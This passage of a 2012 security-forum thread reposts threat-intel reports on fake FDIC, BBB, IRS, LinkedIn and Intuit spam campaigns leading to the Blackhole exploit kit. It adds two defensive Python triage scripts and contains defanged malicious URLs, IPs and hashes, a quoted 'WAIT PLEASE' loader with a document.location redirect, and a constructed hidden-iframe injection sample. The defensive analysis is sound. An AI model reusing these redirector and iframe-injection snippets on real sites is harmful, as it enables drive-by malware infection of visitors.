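Two of the posts above describe the same delivery trick with an HTML attachment rather than a link: the Webroot UPS post (a tiny iframe in the attachment pulls the Blackhole landing URL) and the Websense iPhone 5 post (a hidden, obfuscated script builds the iframe at run time). Those two tells can be triaged statically before anyone previews the file. The scanner below is an added example, not code from Webroot, Websense or this thread; the sample attachments are constructed, the hostname landing.example.invalid is hypothetical, and only the main.php?page= token shape is taken from the thread.

```python
"""Added example: static triage of an HTML e-mail attachment for the two tells
quoted above, a tiny/hidden iframe and an obfuscated inline script.
Not code from Webroot or Websense; the sample attachments are constructed."""
import re
from html.parser import HTMLParser

# Calls a redirector page uses to assemble its iframe at run time; a genuine
# shipping or order notice has no reason to contain any of them.
OBFUSCATION = re.compile(
    r"unescape\s*\(|String\.fromCharCode|document\.write\s*\(|\beval\s*\(", re.I
)


def _tiny(value):
    """True for width/height values of one pixel or less ("1", "0", "1px")."""
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= 1


class AttachmentScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (kind, detail) pairs in document order
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                      or "display:none" in style or "visibility:hidden" in style)
            if hidden:
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "script":
            self._in_script = True
            if a.get("src"):
                self.findings.append(("external-script", a["src"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data unparsed, so the
        # iframe a script writes with unescape() is caught here even though it
        # never appears as a tag in the static markup.
        if self._in_script:
            m = OBFUSCATION.search(data)
            if m:
                self.findings.append(("obfuscated-script", m.group(0)))


def scan_attachment(html):
    """Return the list of (kind, detail) findings for one HTML attachment."""
    p = AttachmentScanner()
    p.feed(html)
    p.close()
    return p.findings


def is_suspicious(html):
    return bool(scan_attachment(html))


# Constructed attachment: a "loading" decoy with both tells present.
SAMPLE_BAD = """<html><body>
<h2>UPS Shipment Notification</h2><p>Please wait while the page is loading...</p>
<script type="text/javascript">
document.write(unescape('%3Ciframe%20src%3D%22http%3A//landing.example.invalid/main.php%3Fpage%3D0f123fe645ddf8d7%22%20width%3D1%20height%3D1%3E%3C/iframe%3E'));
</script>
<iframe src="http://landing.example.invalid/main.php?page=0f123fe645ddf8d7" width="1" height="1"></iframe>
</body></html>"""

# Constructed benign attachment: a visible embedded frame and no script.
SAMPLE_OK = """<html><body><h2>Invoice</h2>
<iframe src="https://maps.example.com/embed" width="600" height="400"></iframe>
</body></html>"""

if __name__ == "__main__":
    for name, doc in (("bad", SAMPLE_BAD), ("ok", SAMPLE_OK)):
        print(name, scan_attachment(doc))
```

Neither rule alone is proof (some newsletters do hide tracking iframes), but an attachment that claims to be a delivery notice and needs document.write(unescape(...)) to render should never reach a browser; quarantine it and pull the decoded URL for blocking.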
-
Fake FDIC emails serve client-side exploits and malware
FYI...
Fake FDIC emails serve client-side exploits and malware
- http://blog.webroot.com/2012/09/19/c...s-and-malware/
Sep 19, 2012 - "... cybercriminals started spamvertising millions of emails impersonating the Federal Deposit Insurance Corporation (FDIC), in an attempt to trick businesses into installing a bogus and non-existent security tool promoted in the emails. Upon clicking on the links, users are exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised FDIC impersonating email:
> https://webrootblog.files.wordpress....xploit_kit.png
Once the user clicks on the malicious link, he’s exposed to the following bogus “Page loading…” page:
> https://webrootblog.files.wordpress....oit_kit_01.png
Client-side exploits serving URL: hxxp ://afgreenwich .net/main.php?page=0f123fe645ddf8d7 - 203.91.113.6 (AS24559)...
Upon successful client-side exploitation, the campaign drops MD5: 3ce1ae2605aa800c205ef63a45ffdbfa *
... Trojan-Ransom.Win32.Gimemo.aovu; W32.Cridex
Once executed, it attempts to phone back to 72.167.253.106 :8080/mx/5/B/in (AS26496)...
More MD5s are known to have phoned back to the same IP in the past, for instance:
MD5: 97974153c25baf5826bf441a8ab187a6 **
...Trojan.Win32.Jorik.Zbot.fxq; Gen:Variant.Zusy.17989
... and MD5: 9069210d0758b34d8ef8679f712b48aa ***
... Trojan.Winlock.6049; W32/Cridex.R ..."
* https://www.virustotal.com/file/8774...8c93/analysis/
File name: b9126f7be02c682d7b1b534c928881a0aba6ae0c
Detection ratio: 25/42
Analysis date: 2012-09-16
** https://www.virustotal.com/file/4b9a...325b/analysis/
File name: test73608696665548.bin
Detection ratio: 16/42
Analysis date: 2012-09-13
*** https://www.virustotal.com/file/c6c8...b59a/analysis/
File name: readme.exe
Detection ratio: 6/42
Analysis date: 2012-09-14
___
New Malware Sites using Blackhole Exploit Kit v2.0
- https://blog.opendns.com/2012/09/18/...loit-kit-v2-0/
Sep 18, 2012
:mad: :mad:
-
LinkedIn SPAM - Blackhole Exploit Kit v2.0...
FYI...
LinkedIn SPAM / 69.194.201.21
- http://blog.dynamoo.com/2012/09/link...919420121.html
22 Sep 2012 - "This fake LinkedIn spam leads to malware on 69.194.201.21:
Date: Sat, 22 Sep 2012 15:16:47 -0500
From: "Reminder" [CC8504C0E@updownstudio.com]
Subject: LinkedIn: New messages awaiting your response
LinkedIn
REMINDERS
Invitation reminders:
From Emilio Byrd (Insurance Manager at Wolseley)
PENDING MESSAGES
There are a total of 88 message(-s) awaiting your response. Go to InBox now.
This message was sent to [redacted]. This is an occasional email to help you get the most out of LinkedIn.
Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user without your permission.
2012, LinkedIn Corporation.
The malicious payload is at [donotclick]69.194.201.21 /links/deep_recover-result.php (Solar VPS, US) which appears to be a Blackhole 2 exploit kit. Blocking this IP address would be prudent."
___
Fake 'KLM e-Ticket' attempts to install backdoor
- http://community.websense.com/blogs/...-backdoor.aspx
21 Sep 2012 - "... malicious zipped attachment..."
:fear: :mad:
-
BBB malicious SPAM flood
FYI...
BBB malicious SPAM flood
- http://community.websense.com/blogs/...pam-flood.aspx
24 Sep 2012 - "... another barrage of malicious BBB (Better Business Bureau) complaint notifications... Websense.. has detected and intercepted a marked increase in BBB malicious email this month... In an attempt to look authentic, the messages include an official graphic from the BBB Web site but, as is often the case with malicious email campaigns, they also include suspicious grammar: "about your company possible involvement in check cashing and Money Order Scam."
> http://community.websense.com/cfs-fi...D00_Image1.png
... a number of different subjects have been utilized for this campaign, presumably in an attempt to thwart detection, including random "Complaint IDs"...
> http://community.websense.com/cfs-fi...2D00_550x0.png
... As with other similar malicious campaigns with themes relating to ADP, Twitter, and LinkedIn, the techniques, tools and redirection path that are used are pretty much the same. Tools like the Cutwail spambot and Blackhole exploit kit seem to be the main weapons used by cybercriminals in malicious spam nowadays. Redirection paths:
1) hxxp ://vargasvilcolombia .com/PykKDZe/index.html
2)<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp ://pst.org .br/Wi4aFSLZ/js.js"></script>
<script type="text/javascript" src="hxxp ://www.adahali .com/NQ9Ba2ap/js.js"></script>
</html>
3) document.location='hxxp ://108.178.59.11 /links/deep_recover-result.php';
As is very common these days, the payload for this particular campaign is the recently updated BlackHole Exploit Kit v 2.0..."
___
BBB Spam / 108.178.59.11
- http://blog.dynamoo.com/2012/09/bbb-...081785911.html
24 Sep 2012 - "... most likely a Blackhole 2 kit. This IP address has been used in other attacks and should be blocked if you can."
- http://centralops.net/co/DomainDossier.aspx
108.178.59.11
network: State: Italy
OriginAS: AS32475
- http://google.com/safebrowsing/diagnostic?site=AS:32475
"... over the past 90 days, 2949 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-09-24, and the last time suspicious content was found was on 2012-09-24... we found 149 site(s)... that appeared to function as intermediaries for the infection of 375 other site(s)... We found 141 site(s)... that infected 838 other site(s)..."
:mad:
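The three-stage redirection path quoted in the Websense BBB post (compromised site, "WAIT PLEASE" loader pulling two remote js.js files, then a document.location jump to the exploit-kit landing page) is exactly the kind of chain an analyst wants to walk without a browser. The block below is an added example, not Websense's or Dynamoo's own code: the stage bodies are the ones printed in the post (still defanged), fetching is replaced by a dictionary lookup so it runs offline, and it assumes that stage 1 served the loader shown as stage 2 and that both js.js files carry the stage-3 redirect line (the post does not say which file contained it). The landing-page path pattern (`/links/...php`, `/forum/links/...php`, `/detects/...php`) is a heuristic drawn from the payload URLs quoted across these posts, not a published Blackhole signature.

```python
"""Walk the redirection path quoted in the BBB post: compromised site ->
"WAIT PLEASE" loader -> remote js.js -> document.location jump to the
exploit kit. Stage bodies are copied from the post; fetching is a dict
lookup so this runs offline. Added example, not the bloggers' own code."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

START = "hxxp ://vargasvilcolombia .com/PykKDZe/index.html"

# Stage 2 exactly as printed in the post (defanged).
LOADER_HTML = """<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp ://pst.org .br/Wi4aFSLZ/js.js"></script>
<script type="text/javascript" src="hxxp ://www.adahali .com/NQ9Ba2ap/js.js"></script>
</html>"""

# Stage 3 as printed in the post; ASSUMED to be the body of both js.js files.
REDIRECT_JS = "document.location='hxxp ://108.178.59.11 /links/deep_recover-result.php';"


def refang(s):
    """Undo the 'hxxp ://', 'host .tld' and '[donotclick]' defanging the posts use."""
    s = s.replace("[donotclick]", "").strip()
    s = re.sub(r"hxxp(s?)\s*://", r"http\1://", s)
    return s.replace(" .", ".").replace(" /", "/")


# ASSUMPTION: stage 1 served the loader page; both js.js files carry the redirect.
SAMPLE = {
    refang(START): LOADER_HTML,
    "http://pst.org.br/Wi4aFSLZ/js.js": REDIRECT_JS,
    "http://www.adahali.com/NQ9Ba2ap/js.js": REDIRECT_JS,
}

REDIRECT_RE = re.compile(
    r"""(?:document|window|top|self)\.location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""")

# Heuristic from the payload paths quoted in these posts (/links/x.php, /forum/links/x.php, /detects/x.php).
BH_PATH_RE = re.compile(r"^/(?:forum/)?(?:links|detects)/[A-Za-z0-9_-]+\.php$")


class LoaderParser(HTMLParser):
    """Collect external <script src> targets and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.scripts, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.scripts.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


def next_hops(url, body):
    """URLs the document at `url` loads next, as (kind, absolute_url) pairs."""
    hops = []
    if re.search(r"<\s*(?:html|script)\b", body, re.I):
        p = LoaderParser()
        p.feed(body)
        hops += [("script", urljoin(url, refang(src))) for src in p.scripts]
        js = "\n".join(p.inline)
    else:
        js = body  # a bare .js file
    hops += [("redirect", urljoin(url, refang(m.group(1)))) for m in REDIRECT_RE.finditer(js)]
    return hops


def walk(url, fetch, chain=None, kind="start"):
    """Depth-first walk of the chain; `fetch(url)` returns a body or None."""
    chain = [] if chain is None else chain
    url = refang(url)
    if any(u == url for _, u in chain):  # loop / duplicate protection
        return chain
    chain.append((kind, url))
    body = fetch(url)
    if body is not None:
        for k, nxt in next_hops(url, body):
            walk(nxt, fetch, chain, k)
    return chain


def landing_pages(chain):
    """Redirect targets whose path matches the exploit-kit path heuristic."""
    return [u for k, u in chain if k == "redirect" and BH_PATH_RE.match(urlsplit(u).path)]


if __name__ == "__main__":
    chain = walk(START, SAMPLE.get)
    for kind, u in chain:
        print(f"{kind:9s} {u}")
    print("block:", landing_pages(chain))
```

Swapping `SAMPLE.get` for a real fetcher (a sandboxed `requests.get` with a browser User-Agent, since these kits fingerprint clients) turns this into a chain walker; keep the seen-list check, because loaders that include the same js.js twice, as this one does, would otherwise be fetched twice.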
-
Twitter DMs from "friends" lead to backdoor Trojan...
FYI...
Twitter DMs from "friends" lead to backdoor Trojan
- http://nakedsecurity.sophos.com/2012...video-malware/
Sep 24, 2012 - "Have you received a Twitter message from an online friend, suggesting you have been captured in a Facebook video?... The aim of the messages? To trick the unwary into clicking on a link... and ultimately infect computers. Here is one example:
> https://sophosnews.files.wordpress.c...cked.jpg?w=640
... here's another. Note that there are many different combinations of wording that can be used.
> https://sophosnews.files.wordpress.c...ed-2.jpg?w=640
Users who click on the link are greeted with what appears to be a video player and a warning message that "An update to Youtube player is needed". The webpage continues to claim that it will install an update to Flash Player 10.1 onto your computer.
> https://sophosnews.files.wordpress.c...ware.jpg?w=640
... In this example, the program you are being invited to download is called FlashPlayerV10.1.57.108.exe, and is detected by Sophos anti-virus products as Troj/Mdrop-EML, a backdoor Trojan that can also copy itself to accessible drives and network shares. Quite how users' Twitter accounts became compromised to send the malicious DMs in the first place isn't currently clear, but the attack underlines the importance of -not- automatically clicking on a link just because it appeared to be sent to you by a trusted friend. If you do find that it was your Twitter account sending out the messages, the sensible course of action is to assume the worst, change your password (make sure it is something unique, hard-to-guess and hard-to-crack) and revoke permissions of any suspicious applications that have access to your account."
:mad:
-
Multiple malware IP's to be blocked ...
FYI...
Evil network: 108.178.59.0/26
- http://blog.dynamoo.com/2012/09/evil...817859026.html
25 Sep 2012 - "There's quite a bit of malware coming from a range of Singlehop IPs over the past few days. The range is 108.178.59.0/26 (108.178.59.0 - 108.178.59.63)
So far, I've seen blackhole samples from 108.178.59.20, 108.178.59.11 and 108.178.59.26 which is enough to convince me that the whole /26 is bad and should be blocked.
Singlehop have reallocated the IP range to a customer:
network: IP-Network: 108.178.59.0/26
network: State: Italy
network: Country-Code: IT ...
It's quite possible that Mr Coco doesn't know that the IP range is being abused in this way, but blocking access to it would be prudent..."
- http://centralops.net/co/DomainDossier.aspx
network: IP-Network: 108.178.59.0/26
network: State: Italy
network: Country-Code: IT
___
BBB SPAM / one.1000houses .biz
- http://blog.dynamoo.com/2012/09/bbb-...housesbiz.html
25 Sep 2012 - "This fake BBB spam leads to malware at one.1000houses .biz:
Date: Tue, 25 Sep 2012 11:42:18 +0200
From: "Better.Business Bureau" [8050910@zread.com]
Subject: Activity Report
Dear business owner, we have received a complaint about your company possible involvement in check cashing and Money Order Scam.
You are asked to provide response to this complaint within 7 days.
Failure to provide the necessary information will result in downgrading your Better Business Bureau rating and possible cancellation of your BBB accreditation status.
Complaint ID#125368
Council of Better Business Bureaus
3033 Wilson Blvd, Suite 600
Arlington, VA 22201
Phone: 1 (703) 276.0100
Fax: 1 (703) 525.8277
The malicious payload is at [donotclick]one.1000houses .biz/links/deep_recover-result.php hosted on 199.195.116.185 (A2 Hosting, US). The domain 1000houses .biz appears to be a legitimate domain where the GoDaddy account has been hacked to serve malware on subdomains. There seems to be a long-standing issue with GoDaddy domains being used in this way.
Blocking 199.195.116.185 would probably be prudent..."
:mad: :mad:
-
FTC halts computer spying
FYI...
FTC halts computer spying
* http://www.ftc.gov/opa/2012/09/designware.shtm
09/25/2012
Rent-to-own laptops were spying on users
- http://h-online.com/-1717567
26 Sep 2012 - "The US Federal Trade Commission (FTC) has settled a case with several computer rent-to-own companies and a software maker over their use of a program which spied on as many as 420,000 users of the computers. The terms of the settlement* will ban the companies from using monitoring software, deceiving customers into giving up information or using geo-location to track users. "The FTC orders today will put an end to their cyber spying" said Jon Leibowitz, FTC Chairman. The software for rental companies from DesignerWare included a "Detective Mode", a spyware application that, according to the FTC's complaint, could activate the webcam of a laptop and take pictures and log keystrokes of user activity. The software also regularly presented a fake registration screen designed to trick users into entering personal information. The data from this application was then transmitted to DesignerWare where it was then passed on to the rent-to-own companies... The FTC is limited in its actions, telling Wired**, "We don't have criminal authority. We only have civil authority" and, as this was a first violation of the FTC act, it cannot impose fines on the companies. Instead, the companies will be monitored by the FTC for compliance with the ban on using the software, or, in the case of DesignerWare, licensing it, for the next 20 years..."
** http://www.wired.com/threatlevel/201...yware-scandal/
:mad:
-
Spear Phishing Emails increase 56% ...
FYI...
Spear Phishing Emails increase 56% ...
- http://blog.fireeye.com/research/201...ng-emails.html
2012.09.25 - "Despite the many security defenses aimed at protecting email communications, email continues to be a critical vulnerability for enterprises. Between Q1 2012 and Q2 2012 alone, FireEye reported a 56% increase in the amount of malicious emails - and this wasn’t simply an increase in the total number of emails distributed; it was an increase in the number of emails that were able to -bypass- signature and reputation-based security defenses, like next-generation firewalls, intrusion prevention systems (IPS), anti-virus (AV), and secure gateways... In a new report from FireEye*, FireEye researchers analyze the nature of malicious files cybercriminals distribute in order to bypass traditional security defenses and identify several trends - including the most common words in file names and file extensions used in spear phishing attacks. Among these trends, in particular, FireEye researchers found:
• File names relating to shipping grew from 19.20% to 26.35%.
• Number of files referencing words associated with urgency grew from 1.72% to 10.68%.
• Shipping-related words topped the lists of most frequently appearing words in spear phishing emails for both 2H 2011 and 1H 2012.
In the security community, we’re more than familiar with the consequences stemming from these kinds of advanced cyber attacks - GhostNet, Night Dragon, Operation Aurora, and the RSA breach all originated, at least in part, via targeted spear phishing emails. These highly publicized incidents only further indicate what cybercriminals already well know and use to their advantage: email is a mode of attack that works..."
* http://www.fireeye.com/resources/pdf...hing-words.pdf
:mad:
-
IRS SPAM - 3 different versions ...
FYI...
IRS SPAM - 3 different versions ...
- http://blog.dynamoo.com/2012/09/irs-...ancom-and.html
26 Sep 2012 - "Three different versions of fake IRS spam today, two leading to malware on 1.howtobecomeabostonian .com and the other with a malicious payload on mortal-records .net.
Date: Wed, 26 Sep 2012 20:44:47 +0530
From: "Internal Revenue Service (IRS)" [58D1F47@guyzzer.com]
To: [redacted]
Subject: Internal Revenue Service: For the attention of enterpreneurs
Internal Revenue Service (IRS)
Hello,
Due to the system error the EIN of your company has been accidently erased from the online database, please validate your EIN to reaffirm your current status of taxpayer. Certain indulgences will be applied to the next audit report for your company. IRS is sorry to cause inconvenience.
For detail information, please refer to:
https ://www.irs .gov/Login.aspx?u=E8710D9E9
Email address: [redacted]
Sincerely yours,
Barry Griffin
IRS Customer Service representative
Update your subscriptions, modify your password or email address, or stop subscriptions at any time on your Subscriber Preferences Page.
You will need to use your email address to log in.
This service is provided to you at no charge by the Internal Revenue Service (IRS).
This email was sent to [redacted] by: Internal Revenue Service (IRS) · Internal Revenue Service · 1111 Constitution Ave. N.W. · Washington DC 20535
==========
Date: Wed, 26 Sep 2012 11:09:45 -0400
From: "Internal Revenue Service (IRS)" [90A75BC@etherplay.com]
To: [redacted]
Subject: Internal Revenue Service: For the attention of enterpreneurs
Internal Revenue Service (IRS)
Dear business owners,
Due to the corrections in the taxation policies that have been recently applied, IRS informs that LLC, C-Corporations and S-Corporations have to validate their EIN in order to reaffirm their actual status. You have 14-day period in order to examine all the changes and make necessary amendments. We are sorry for the inconvenience caused.
For the details please refer to:
https ://www.irs .gov/ClientArea.aspx?u=1CBD0FC829256C
Email address: [redacted]
Sincerely yours,
Damon Abbott
Internal Revenue Service Representative
Update your subscriptions, modify your password or email address, or stop subscriptions at any time on your Subscriber Preferences Page.
You will need to use your email address to log in.
This service is provided to you at no charge by the Internal Revenue Service (IRS).
This email was sent to [redacted] by: Internal Revenue Service (IRS) · Internal Revenue Service · 1111 Constitution Ave. N.W. · Washington DC 20535
==========
Date: Wed, 26 Sep 2012 19:53:28 +0400
From: Internal Revenue Service [weirdpr6@polysto.com]
To: [[redacted]]
Subject: IRS report of not approved tax bank transfer
Your Federal Tax pending transaction (ID: 52007291963155), recently ordered for processing from your checking account was rejected by your Bank.
Rejected Tax transaction
Tax Transaction ID: 52007291963155
Reason ID See details in the report below
State Tax Transaction Report tax_report_52007291963155.doc (Microsoft Word Document)
Internal Revenue Service 9611 Tellus. Av. Augusta 38209 MV
Payload one is at [donotclick]1.howtobecomeabostonian .com/links/marked-alter.php hosted on 74.207.232.13 (Linode, US) which looks like a -hacked- GoDaddy domain. Payload two is at [donotclick]mortal-records .net/detects/processing-successfully.php hosted on 203.91.113.6 (G-Mobile, Mongolia) which is an IP address that has been used a LOT for this type of attack. Blocking those IPs would be ideal..."
:mad:
-
Fake iPhone emails/sales sites ...
FYI...
Fake iPhone sales emails/sites ...
- http://blog.webroot.com/2012/09/27/f...iate-networks/
Sep 27, 2012 - "... cybercriminals continue introducing new services and goods with questionable quality and sometimes unknown origins on the market, with the idea to entice potential network participants into monetizing the traffic they can deliver through black hat SEO (Search Engine Optimization), malvertising, and spam campaigns... a recently launched affiliate network selling iPhones that primarily targets Russian-speaking customers, and emphasizes the traffic acquisition scheme used by one of the network’s participants... It all starts with a spam campaign offering brand new iPhones for a decent price in an attempt by one of the network participants to acquire traffic which will ultimately convert into sales.
Sample spamvertised email offering cheap and easy-to-obtain iPhones"
> https://webrootblog.files.wordpress....te_network.png
... an example of an affiliate network participant targeting English-speaking users, even though the actual web site is targeting Russian-speaking users...
Sample screenshot of the entry page for the iPhone selling affiliate network:
> https://webrootblog.files.wordpress....te_network.png
(More samples available at the blog.webroot URL above)...
We advise bargain hunters to avoid clicking on links found in spam emails, avoid entering their credit card details on sites found in spam emails, and to avoid purchasing -any- kind of item promoted in these emails."
:mad:
-
SPAM leads to malware - 2012.10.01...
FYI... multiple entries:
Intuit SPAM - Shipment / art-london .net
- http://blog.dynamoo.com/2012/10/intu...londonnet.html
1 Oct 2012 - "This terminally confused Intuit / USPS / Amazon-style spam leads to malware...
Date: Mon, 1 Oct 2012 21:31:57 +0430
From: "Intuit Customer Service" [battingiy760@clickz.com]
To: [redacted]
Subject: Intuit Shipment Confirmation
Dear [redacted],
Great News! Your order, ID859560, was shipped today (see info below) and will complete shortly. We hope that you will find that it exceeds your expectations. If you ordered not one products, we may send them in separate boxes (at no additional cost to you) to ensure the fastest possible delivery. We will also provide you with the ability to track your shipments via the information below.
Thank you for your interest.
ORDER DETAILS
Order #: ID859560
Order Date: Sep 25, 2012
Item(s) In Your Order
Shipping Date: October, 1 2012
Shipping Method: USPS Express Mail
Estimated Delivery Date: October, 3 2012 - October 05, 2012
Tracking No.: 5182072894288348304217
Quantity Item
1 Intuit Card Reader Device - Gray
Please be informed that shipping status details may be not available yet online. Check the Website Status link above for details update.
Shipment Information:
We sent your item(s) to the next address:
065 S Paolo Ave, App. 5A
S Maria, FL
Email: [redacted]
Questions about your order? Please visit Customer Service.
Return Policy and Instructions
Privacy | Legal Disclaimer | Contact Us | About
You have received this business note as part of our efforts to fulfill your request and service your account. You may receive more email notifications from us even if you have previously selected out of marketing notifications...
The malicious payload is at [donotclick]art-london .net/detects/stones-instruction_think.php hosted on 195.198.124.60 (Skand Meteorologi och Miljoinstr AB, Sweden), a site which also hosts the presumably malicious domain indice-acores .net. Presumably this IP is a hacked server belonging to some legitimate Swedish organisation, but you should block it nonetheless."
___
Fake Intuit order confirmation
- http://security.intuit.com/alert.php?a=59
10/01/2012 - "... receiving emails with the title "Your Intuit Order Notification."
Below is a copy of the email people are receiving:
> http://security.intuit.com/images/yourintuitorder.jpg
... This is the end of the fake email. Steps to Take Now: Do not click on the link in the email... Delete the email..." etc...
___
Sendspace SPAM / onlinebayunator .ru
- http://blog.dynamoo.com/2012/10/send...yunatorru.html
1 Oct 2012 - "I haven't seen Sendspace spam before.. but here it is, leading to malware on onlinebayunator .ru:
Date: Mon, 1 Oct 2012 10:40:29 +0300
From: Twitter
To: [redacted]
Subject: You have been sent a file (Filename: [redacted]-9038870.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]-56.pdf, (133.8 KB) waiting to be downloaded at sendspace.(It was sent by CHIQUITA Caldwell).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,
sendspace - The best free file sharing service...
The malicious payload is at [donotclick]onlinebayunator .ru:8080/forum/links/column.php hosted on the same IP address ( 84.22.96.0/19 ) as this attack* earlier today.
* http://blog.dynamoo.com/2012/10/nach...yunatorru.html
___
Evolution1 SPAM / 69.194.194.221
- http://blog.dynamoo.com/2012/10/evol...194194221.html
1 Oct 2012 - "I haven't seen this spam before, it leads to malware on 69.194.194.221:
Date: Mon, 01 Oct 2012 15:44:59 +0200
From: "INTUIT" [D6531193@familyhealthplans.com]
Subject: Information regarding Employer Contribution
INTUIT
Attn: Account Holder
You can view the information about all Employer contributions that are due to be made on 2/1/2012 by visiting the following link:
http ://intuithealthemployer .lh1ondemand .com
Please let us know employment alterations on your enrollment spreadsheet within the period of two business days. The foregoing report shows the ACH amount we will withdraw from your bank account for the contributions on the first business day of the month. Please remember, if changes occur, this may affect the ACH amount.
Intuit Health Debit Card Powered by Evolution1 Employer Services..."
The malicious payload is on 69.194.194.221 (Solar VPS, US) ..."
___
NACHA SPAM / onlinebayunator .ru
- http://blog.dynamoo.com/2012/10/nach...yunatorru.html
1 Oct 2012 - "This fake NACHA spam leads to malware on onlinebayunator.ru:
Date: Mon, 1 Oct 2012 04:16:46 -0500
From: Bebo Service [service@noreply.bebo.com]
Subject: Fwd: ACH Transfer rejected
The ACH debit transfer, initiated from your bank account, was canceled.
Canceled transaction:
Transfer ID: FE-764029897226US
Transaction Report: View
Valentino Dickey
NACHA - The Electronic Payment Association
f0c34915-3e624bbb...
The malicious payload is at [donotclick]onlinebayunator .ru:8080/forum/links/column.php (probably a Blackhole 2 exploit kit) hosted on the following familiar IPs that should be blocked:
84.22.100.108 (Republic CyberBunker, Antarctica - Amsterdam more likely)
190.10.14.196 (RACSA, Costa Rica)
203.80.16.81 (Myren, Malaysia)
Of note, CyberBunker has a long history of spamming and tolerating criminals. Blocking the range 84.22.96.0/19 should afford your network some additional protection."
:mad: :mad: :mad:
-
SPAM fakes 4 U ... 2012.10.02
FYI... multiple entries:
Fake ecard - unsolicited secret admirers via Email
- http://community.websense.com/blogs/...via-email.aspx
02 Oct 2012 - "... an unsolicited email campaign in which love-struck or curious recipients may have their appetites whetted by the thought of a secret admirer... The messages, sent from various Yahoo .com accounts, suggest that the sender has "to let you know how [they] feel" and provide an enticing Facebook link to "View Your Ecard":
> http://community.websense.com/cfs-fi...2D00_550x0.png
... a valid short Facebook URL is used which, in this case, -redirects- ... a basic JavaScript is delivered... The victim's browser is then directed to a fake ecard site hxxp ://readyourecard .com/viewmessage/?a=vip36
> http://community.websense.com/cfs-fi...2D00_550x0.png
... At this point, the aim of the campaign becomes clear: Every link on the fake ecard page redirects to an affiliate landing page on the Adult Dating website AdultFriendFinder .com and, with affiliate earnings of up to $1 per unique visitor, you can easily see how such a campaign could become very lucrative... This campaign appears to be financially driven, but it is conceivable that the same techniques could be used to direct victims to malicious sites..."
___
Fake Fax Email notifications ...
- http://www.gfi.com/blog/beware-fake-...n-circulation/
Oct 2, 2012 - "In the last few days we’ve seen this fake fax email doing the rounds, offering up a “2013 recruitment plan”:
> http://www.gfi.com/blog/wp-content/u...axmalware1.jpg
... INCOMING FAX REPORT
*********************************************************
Date/Time: 09/28/2012 07:01:41 AM
Speed: 14400 bps
Connection time: 01:02
Pages: 2
Resolution: Normal
Remote ID: 0420950504
Line number: 2
DTMF/DID:
Description: 2013 Recruitment plan
Click here to view the file online ..."
... Clicking the link would take the user from a (dot)de domain to an IP associated with a Malware run currently taking place... currently leads to a "page not found":
> http://www.gfi.com/blog/wp-content/u...axnotfound.jpg
... varied subject lines in this particular spam campaign – everything from recruitment plans to employment contributions and transaction reports – indicate a definite lean towards business targets rather than home users. Of course, whether at home or in the workplace you’re still potentially at risk should you click any of the links going out in this spamrun..."
:mad:
-
SPAM leading to malware ...
FYI...
Fake Quickbooks emails lead to malware
- http://www.gfi.com/blog/fake-quickbo...-shenanigans/?
Oct 3, 2012 - "We have some more rogue emails following the familiar pattern of the last few days – this time around, a fake Quickbooks themed email which promises “free shipping for Quickbooks customers”:
> http://www.gfi.com/blog/wp-content/u...kbooksspam.jpg
It points to a website that shows the end-user a “connecting to server” message, eventually redirecting to an IP address that has been / is still associated with Blackhole Exploit Kit and Java exploits.
> http://www.gfi.com/blog/wp-content/u...booksspam2.jpg
... it’s a bad time to be randomly opening dubious emails..."
Fake QB/IRS order forms emails
- http://security.intuit.com/alert.php?a=62
10/03/2012
> http://security.intuit.com/images/phish63.jpg
___
Something evil on 66.45.251.224/29 and 199.71.233.226
- http://blog.dynamoo.com/2012/10/some...22429-and.html
3 Oct 2012 - "The IP address 199.71.233.226 (Netrouting, US) and the range 66.45.251.224/29 (Interserver, US) are currently being used to distribute malware through advertising. Of these the 66.45.251.224/29 has been suballocated to an anonymous person, which I didn't even know was permitted... The domains listed below are on those IP addresses, all appear to be distributing malware (see example*) and they seem to have fake or anonymous WHOIS details. Blocking traffic to 66.45.251.224/29 (66.45.251.224 - 66.45.251.231) and 199.71.233.226 should be effective in countering this threat..."
Update: 95.211.193.36 (Leaseweb, Netherlands) and 77.95.230.77 (Snel Internet Services, Netherlands) may also be distributing malware in connection with this (report here**).
(More info at the blog.dynamoo URL above.)
* http://www.google.com/safebrowsing/d...juniorppv.info
"Site is listed as suspicious... Malicious software includes 8 trojan(s)..."
** http://wepawet.iseclab.org/view.php?...259972&type=js
___
Friendster SPAM / sonatanamore .ru
- http://blog.dynamoo.com/2012/10/frie...anamoreru.html
2 Oct 2012 - "Friendster.. remember that? Before Facebook.. before Myspace.. there was Friendster. This spam email is -not- from Friendster though and leads to malware on sonatanamore .ru:
Date: Tue, 2 Oct 2012 05:39:54 -0500
From: Friendster Games [friendstergames@friendster.com]
Thank you for joining Friendster! Your system generated password is 0JR8YXB1YR. You may change your password in your Account Settings Page.
Friendster is the social gaming destination of choice. Connect and play with your friends & share your progress with your network.
Copyright © 2002 - 2012 Friendster, Inc. All rights reserved. Visit our site. - Terms of Service
To manage your notification preferences, go here
To stop receiving emails from us, you can unsubscribe here
